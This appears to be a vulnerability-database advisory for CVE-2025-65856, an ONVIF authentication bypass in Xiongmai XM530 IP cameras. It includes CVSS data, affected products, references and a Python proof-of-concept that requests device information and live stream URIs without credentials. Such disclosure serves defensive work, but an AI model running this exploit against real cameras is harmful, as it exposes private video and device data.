CVE-2025-65856

Description

Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:* - NOT VULNERABLE

Xiongmai XM530 IP Camera 固件 V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65856 PoC - Xiongmai XM530 IP Camera ONVIF Authentication Bypass
Author: Security Researcher
"""
import requests
import xml.etree.ElementTree as ET

TARGET_IP = "192.168.1.100"  # Target camera IP
ONVIF_PORT = 80

# ONVIF namespaces
NAMESPACES = {
    'SOAP-ENV': 'http://www.w3.org/2003/05/soap-envelope',
    'ns1': 'http://www.onvif.org/ver10/device/wsdl',
    'tt': 'http://www.onvif.org/ver10/schema'
}

def create_onvif_request(soap_body):
    """Generate ONVIF SOAP request without authentication"""
    return f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    {soap_body}
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

def send_onvif_request(endpoint, soap_body):
    """Send ONVIF request to target device"""
    url = f"http://{TARGET_IP}:{ONVIF_PORT}/{endpoint}"
    headers = {'Content-Type': 'application/soap+xml; charset=utf-8'}
    try:
        resp = requests.post(url, data=soap_body.encode(), headers=headers, timeout=5)
        return resp.text
    except Exception as e:
        return f"Error: {e}"

def get_device_info():
    """Bypass auth to get device information"""
    soap = '''<ns1:GetDeviceInformation/>'''
    request = create_onvif_request(soap)
    return send_onvif_request('onvif/device_service', request)

def get_stream_uri():
    """Bypass auth to get live video stream URI"""
    soap = '''<ns1:GetStreamUri>
      <ns1:StreamSetup>
        <tt:Stream>RTP-Unicast</tt:Stream>
        <tt:Transport><tt:Protocol>RTSP</tt:Protocol></tt:Transport>
      </ns1:StreamSetup>
      <ns1:ProfileToken>Profile_1</ns1:ProfileToken>
    </ns1:GetStreamUri>'''
    request = create_onvif_request(soap)
    return send_onvif_request('onvif/media_service', request)

def main():
    print(f"[*] CVE-2025-65856 PoC - Targeting {TARGET_IP}")
    print("[*] Testing authentication bypass on ONVIF endpoints\n")
    
    print("[1] Attempting to get device information...")
    device_info = get_device_info()
    print(device_info)
    
    print("\n[2] Attempting to get video stream URI...")
    stream_uri = get_stream_uri()
    print(stream_uri)
    
    print("\n[!] If unauthenticated access succeeds, device is vulnerable")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65856
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65856
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65856/
[4] VulDB https://vuldb.com/cve/CVE-2025-65856
[5] http://hangzhou.com
[6] http://ip.com
[7] https://luismirandaacebedo.github.io/CVE-2025-65856/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65856", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:08.360", "lastModified": "2026-01-05T18:28:47.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:*", "matchCriteriaId": "6DFBF9B8-CA55-459F-95F9-3606B52D92B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D72FD0CF-CE0C-4466-8F42-099FA0E8D7D5"}]}]}], "references": [{"url": "http://hangzhou.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://ip.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://luismirandaacebedo.github.io/CVE-2025-65856/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}